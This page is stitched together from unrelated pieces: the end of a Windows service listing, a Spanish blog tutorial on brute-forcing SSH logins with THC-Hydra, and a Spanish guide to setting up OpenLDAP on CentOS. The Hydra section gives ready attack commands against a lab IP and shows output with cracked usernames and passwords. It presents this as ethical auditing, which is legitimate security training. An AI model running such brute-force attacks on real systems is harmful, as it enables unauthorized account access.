 O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
 O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
 O23 - Service: @%windir%\system32\RpcEpMap.dll,-1001 (RpcEptMapper) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe
 O23 - Service: @oleres.dll,-5010 (RpcSs) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
 O23 - Service: @%SystemRoot%\System32\SCardSvr.dll,-1 (SCardSvr) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\schedsvc.dll,-100 (Schedule) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\certprop.dll,-13 (SCPolicySvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\sdrsvc.dll,-107 (SDRSVC) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\Sens.dll,-200 (SENS) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\sensrsvc.dll,-1000 (SensrSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\SessEnv.dll,-1026 (SessionEnv) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\shsvcs.dll,-12288 (ShellHWDetection) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe
 O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe
 O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe
 O23 - Service: @%SystemRoot%\system32\sppuinotify.dll,-103 (sppuinotify) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\ssdpsrv.dll,-100 (SSDPSRV) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\sstpsvc.dll,-200 (SstpSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\wiaservc.dll,-9 (StiSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\StorSvc.dll,-100 (StorSvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\swprv.dll,-103 (swprv) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\sysmain.dll,-1000 (SysMain) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\TabSvc.dll,-100 (TabletInputService) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\tapisrv.dll,-10100 (TapiSrv) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\tbssvc.dll,-100 (TBS) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\termsrv.dll,-268 (TermService) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\themeservice.dll,-8192 (Themes) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\mmcss.dll,-102 (THREADORDER) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\trkwks.dll,-1 (TrkWks) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe
 O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe
 O23 - Service: @%SystemRoot%\system32\umrdp.dll,-1000 (UmRdpService) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\upnphost.dll,-213 (upnphost) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\dwm.exe,-2000 (UxSms) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe
 O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe
 O23 - Service: @%SystemRoot%\system32\w32time.dll,-200 (W32Time) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe
 O23 - Service: @%systemroot%\system32\wbiosrvc.dll,-100 (WbioSrvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\wcncsvc.dll,-3 (wcncsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\WcsPlugInService.dll,-200 (WcsPlugInService) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%systemroot%\system32\wdi.dll,-502 (WdiServiceHost) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\wdi.dll,-500 (WdiSystemHost) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\webclnt.dll,-100 (WebClient) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\wecsvc.dll,-200 (Wecsvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\wercplsupport.dll,-101 (wercplsupport) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\wersvc.dll,-100 (WerSvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%ProgramFiles%\Windows Defender\MsMpRes.dll,-103 (WinDefend) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\winhttp.dll,-100 (WinHttpAutoProxySvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%Systemroot%\system32\wbem\wmisvc.dll,-205 (Winmgmt) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%Systemroot%\system32\wsmsvc.dll,-101 (WinRM) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\wlansvc.dll,-257 (Wlansvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe
 O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files\Windows Media Player\wmpnetwk.exe
 O23 - Service: @%SystemRoot%\system32\wpcsvc.dll,-100 (WPCSvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\wpdbusenum.dll,-100 (WPDBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\wscsvc.dll,-200 (wscsvc) - Unknown owner - C:\Windows\System32\svchost.exe
 O23 - Service: @%systemroot%\system32\SearchIndexer.exe,-103 (WSearch) - Unknown owner - C:\Windows\system32\SearchIndexer.exe
 O23 - Service: @%systemroot%\system32\wuaueng.dll,-105 (wuauserv) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\system32\wudfsvc.dll,-1000 (wudfsvc) - Unknown owner - C:\Windows\system32\svchost.exe
 O23 - Service: @%SystemRoot%\System32\wwansvc.dll,-257 (WwanSvc) - Unknown owner - C:\Windows\system32\svchost.exe
--
 End of file - 23766 bytes

by Mauroxan

THC-Hydra es un práctico Software con licencia GPLv3, que permite realizar auditoria por medio de fuerza bruta a las cuentas de  usuarios y contraseñas de los diferentes servicios que se estén  implementando en un sistema de información.

Existe otro tipo de software con funcionalidad parecida,  pero, de THC-Hydra podemos destacar las siguiente características:

  • Licencia que permite el uso y descarga con total libertad.
  • Soporte a gran cantidad de protocolos ( detalles en Currently this tool supports)
  • Flexible en cuanto al uso, y rápido al auditar los sistemas de información.
  • Multiplataforma (Windows, Linux, Solaris, FreeBSD, etc)

Actualmente se está implementando de forma estable la versión 7.1. En BackTrack 5 R1, se encuentra la versión 6.5 instalada y funcional.

Currently this tool supports:
	  AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST,
	  HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
	  HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
	  PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
	  SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Tomado de http://www.thc.org/thc-hydra/
 

Opciones para uso de la versión 6.5 implementada en BackTrack 5 R1

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
   -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e ns     additional checks, "n" for null password, "s" try login as pass
   -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
   -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -W TIME   defines the wait time between connects for one thread in seconds
   -w TIME   defines the max wait time in seconds for responses (default: 20)
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V   verbose mode / show login+pass combination for each attempt
  -U        service module usage details
Tomado de las ayudas del software que se imprimen por el terminal

THC-Hydra en la Práctica.

Ejemplo 1.

Práctica realizada desde una  distribución BackTrack 5 R1 y con la versión 6.5 de THC-Hydra.

En el siguiente ejemplo atacaremos por fuerza bruta y éticamente con THC-Hydra al servicio SSH instalado en un servidor con IP 172.16.66.219 instalado para estos fines.

En el terminal se escribe el siguiente código:

# hydra -l david -P acronym  172.16.66.219 ssh -s 22 -w 99999999

Donde:

-l hace referencia al nombre de la cuenta del usuario que utiliza el servicio SSH, en el ejemplo es: david.

-P Hace referencia al archivo (diccionario) donde estará el listado de las posibles contraseñas a adivinar, en el ejemplo es: acronym.

ssh Se refiere al servicio que será auditado y se encuentra activo.

-s Hace referencia al puerto del servicio a auditar, en el ejemplo es el 22 correspondiente al servicio SSH.

-w Esta propiedad es muy importante, y hace referencia al tiempo que tomará la auditoría.

 
 Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
 Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 12:45:56
 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se..
 [DATA] 16 tasks, 1 servers, 19195 login tries (l:1/p:19195), ~1199 tries per task
 [DATA] attacking service ssh on port 22
 [STATUS] 152.00 tries/min, 152 tries in 00:01h, 19043 todo in 02:06h
 [22][ssh] host: 172.16.66.219   login: david   password: ADDICT-L
 [STATUS] attack finished for 172.16.66.219 (waiting for children to finish)
 Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 12:48:53

Finalmente el THC-Hydra arroja los resultados, se puede constatar que la contraseña ha sido adivinada, ya que se encontraba dentro del diccionario utilizado como prueba.

Ejemplo 2.

En este ejemplo buscamos a todos los de usuarios que tienen como contraseña 123456 en el  servidor SSH y además se encuentre dentro del diccionario llamado dic.

#hydra -L dic -p 123456 172.16.66.219 ssh -s 22 -w 99999

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 21:53:18
 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se..
[DATA] 16 tasks, 1 servers, 133 login tries (l:133/p:1), ~8 tries per task
[DATA] attacking service ssh on port 22
 [22][ssh] host: 172.16.66.219   login: laura   password: 123456
[STATUS] 74.00 tries/min, 74 tries in 00:01h, 59 todo in 00:01h
[STATUS] 46.00 tries/min, 92 tries in 00:02h, 41 todo in 00:01h
[22][ssh] host: 172.16.66.219   login: carlos   password: 123456
 [STATUS] attack finished for 172.16.66.219 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 21:56:27

Vemos los únicos 2 nombres de usuarios que cumplen con la contraseña 123456.

Hasta una próxima.

by Mauroxan

Inicialmente se abre un terminal en Centos para que se autentifique  como root

$ su root

Se instala el servidor de OpenLDAP con el siguiente comando

# yum -y install openldap openldap-clients openldap-servers nss-pam-ldapd

Con esto debe quedar instalado los siguientes paquetes,  algo así  devuelve la linea de comandos:

(1/7): make-3.81-19.el6.x86_64.rpm                       | 389 kB
(2/7): nscd-2.12-1.7.el6_0.5.x86_64.rpm                  | 198 kB
(3/7): nss-pam-ldapd-0.7.5-3.el6.x86_64.rpm              | 147 kB
(4/7): openldap-2.4.19-15.el6_0.2.x86_64.rpm             | 231 kB
(5/7): openldap-clients-2.4.19-15.el6_0.2.x86_64.rpm     | 157 kB
(6/7): openldap-servers-2.4.19-15.el6_0.2.x86_64.rpm     | 2.6 MB
(7/7): pam_ldap-185-5.el6.x86_64.rpm                     |  87 kB

Complete!

Es posible observar la instalación de OpenLDAP en su versión 2.4.19

De la misma forma instala los paquetes migrationtools.

# yum -y install authconfig authconfig-gtk migrationtools
De la misma forma instalamos los paquetes migrationtools.

De la misma forma se instalan los paquetes migrationtools, para OpenLDAP

Con esto debería quedar algo asi:

migrationtools.noarch 0:47-7.el6

— Certificados SSL para OpenLDAP —

Es necesario ingresar  al siguiente directorio:

# cd /etc/pki/tls/certs

Y se remueve  el archivo slapd.pem

# rm -f slapd.pem

Ahora se teclea el siguiente comando, para generar el nuevo slapd.pem configurado:

# make slapd.pem

Se debe rellenar los siguientes datos que se piden a continuación:

Country Name (2 letter code) [XX]:
State or Province Name (full name) []:
Locality Name (eg, city) [Default City]:
Organization Name (eg, company) [Default Company Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, your name or your server's hostname) []:
Email Address []:

Se crea el certificado con los datos personales y empresariales, generando un  nuevo archivo slapd.com

Ahora debe dar permisos de escritura y lectura al user root y permiso de lectura al grupo ldap, para el archivo slapd.pem

# chown root:ldap slapd.pem
# chmod 640 slapd.pem

Ahora se debe entrar a la carpeta

# cd /var/lib/ldap

Y para crear  un directorio llamado autenticar

# mkdir autenticar

Y se le dan los permisos solo  al usuario y grupo ldap

# chmod 700 autenticar

Se debe copiar el archivo DB_CONFIG.example dentro del directorio autenticar que se acaba de crear. El archivo lo se llamará DB_CONFIG

# cp /usr/share/doc/openldap-servers-xxxx/DB_CONFIG.example /var/lib/ldap/autenticar/DB_CONFIG

Donde xxxx es la version del OpenLDAP que tengas instalada en tu computadora.

Se  dan permisos a la carpeta autenticar y su conenido (-R) pertenecer al grupo ldap

# chown -R ldap:ldap /var/lib/ldap/autenticar

Se genera el hash de la contraseña del Administrador para acceder a OpenLDAP con el siguiente comando:

# slappasswd

Devuelve algo como esto:

{SSHA}+8h998687T4jPKbRIhGZvR6cyUzv163v

Se instala un editor como nano para tocar y editar los archivos de texto por terminal.

# yum install nano

Se pasa a  crear y editar el archivo slapd.conf en la siguiente ruta: /etc/openldap/slapd.conf

# nano /etc/openldap/slapd.conf

Y se copia todo el código siguiente dentro del archivo slapd.conf

include         /etc/openldap/schema/corba.schema
include         /etc/openldap/schema/core.schema
include         /etc/openldap/schema/cosine.schema
include         /etc/openldap/schema/duaconf.schema
include         /etc/openldap/schema/dyngroup.schema
include         /etc/openldap/schema/inetorgperson.schema
include         /etc/openldap/schema/java.schema
include         /etc/openldap/schema/misc.schema
include         /etc/openldap/schema/nis.schema
include         /etc/openldap/schema/openldap.schema
include         /etc/openldap/schema/ppolicy.schema
include         /etc/openldap/schema/collective.schema

TLSCACertificateFile /etc/pki/tls/certs/ca-bundle.crt
TLSCertificateFile /etc/pki/tls/certs/slapd.pem
TLSCertificateKeyFile /etc/pki/tls/certs/slapd.pem

allow bind_v2
pidfile         /var/run/openldap/slapd.pid
argsfile        /var/run/openldap/slapd.args

database        bdb
suffix          "dc=dominio,dc=tld"
rootdn          "cn=Administrador,dc=dominio,dc=tld"
rootpw          {SSHA}LnmZLFeE1/zebp7AyEF09NlGaT1d4ckz
directory       /var/lib/ldap/autenticar

# Indices a mantener para esta base de datos
index objectClass
index ou,cn,mail,surname,givenname
index uidNumber,gidNumber,loginShell
index uid,memberUid
index nisMapName,nisMapEntry

# Habilitar supervisión
database monitor
eq,pres
eq,pres,sub
eq,pres
eq,pres,sub
eq,pres,sub
# Permitir solo a rootdn ver la supervisión
access to *

        by dn.exact="cn=Administrador,dc=dominio,dc=tld" read
        by * none

— Dentro del contenido anterior se editan las siguientes líneas:

suffix          "dc=mistictrading,dc=com"
rootdn          "cn=admin,dc=mistictrading,dc=com"
rootpw          {SSHA}+8h998687T4jPKbRIhGZvR6cyUzv163v

by dn.exact="cn=admin,dc=mistictrading,dc=com" read

En este paso  se da permiso de lectura y escritura al archivo slapd.conf, pero solo para el usuario ldap.

# chown ldap
# chown ldap:ldap /etc/openldap/slapd.conf
# chmod 600 /etc/openldap/slapd.conf

Ahora se procede a eliminar la configuración predeterminada de OpenLDAP, con el siguiente comando.

# rm -rf /etc/openldap/slapd.d/*

Convierta el archivo /etc/openldap/slapd.conf en el nuevo subconjunto de archivos ldif que irán dentro del directorio /etc/ldap/slapd.d:

# slaptest -f /etc/openldap/slapd.conf -F /etc/openldap/slapd.d

El contenido de la carpeta /etc/openldap/slapd.d debe pertenecer al usuario y grupo ldap

# chown -R ldap:ldap /etc/openldap/slapd.d

Es necesario editar  el archivo /etc/openldap/ldap.conf

# nano /etc/openldap/ldap.conf

Para suprimir  el # de BASE y configurar el dominio.

–Se accede entonces  a la carpeta siguiente:

# cd /etc/openldap/slapd.d/cn=config

Se edita el archivo: olcDatabase={0}config.ldif

Se tocan  las siguientes líneas:

olcRootDN: cn=admin,cn=config
olcRootPW: {SSHA}+8h998687T4jPKbRIhGZvR6cyUzv163v

Ahora se edita el siguiente archivo: olcDatabase={1}bdb.ldif

Se tocan las siguientes líneas:

olcSuffix: dc=mistictrading,dc=com
olcRootDN: cn=admin,dc=mistictrading,dc=com
olcRootPW: {SSHA}+8h998687T4jPKbRIhGZvR6cyUzv163v

Por fin —-  Se inicia el servidor

# service slapd start
by Mauroxan